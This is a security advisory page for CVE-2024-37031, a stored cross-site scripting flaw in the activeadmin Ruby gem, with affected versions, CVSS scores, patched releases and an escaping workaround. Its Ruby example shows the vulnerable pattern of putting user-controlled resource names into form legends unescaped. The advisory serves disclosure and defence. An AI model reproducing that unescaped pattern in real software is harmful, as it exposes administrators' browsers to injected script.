logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2024-37031 activeadmin

Package

Manager: gem
Name: activeadmin
Vulnerable Version: >=0 <3.2.2 || >=4.0.0.beta1 <4.0.0.beta7

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

EPSS: 0.00221 pctl0.447

Details

activeadmin vulnerable to stored persistent cross-site scripting (XSS) in dynamic form legends ### Impact Users settings their active admin form legends dynamically may be vulnerable to stored XSS, as long as its value can be injected directly by a malicious user. For example: * A public web application allows users to create entities with arbitrary names. * Active Admin is used to administrate these entities through a private backend. * The form to edit these entities in the private backend has the following shape (note the dynamic `name` value dependent on an attribute of the `resource`): ```ruby form do |f| f.inputs name: resource.name do f.input :name f.input :description end f.actions end ``` Then a malicious user could create an entity with a payload that would get executed in the active admin administrator's browser. Both `form` blocks with an implicit or explicit name (i.e., both `form resource.name` or `form name: resource.name` would suffer from the problem), where the value of the name can be arbitrarily set by non admin users. ### Patches The problem has been fixed in ActiveAdmin 3.2.2 and ActiveAdmin 4.0.0.beta7. ### Workarounds Users can workaround this problem without upgrading by explicitly escaping the form name using an HTML escaping utility. For example: ```ruby form do |f| f.inputs name: ERB::Util.html_escape(resource.name) do f.input :name f.input :description end f.actions end ``` Upgrading is of course recommended though. ### References https://owasp.org/www-community/attacks/xss/#stored-xss-attacks

Metadata

Created: 2024-06-02T22:32:24Z
Modified: 2024-10-28T12:37:00Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-9mg6-x45v-hcfm/GHSA-9mg6-x45v-hcfm.json
CWE IDs: ["CWE-79"]
Alternative ID: GHSA-9mg6-x45v-hcfm
Finding: F425
Auto approve: 1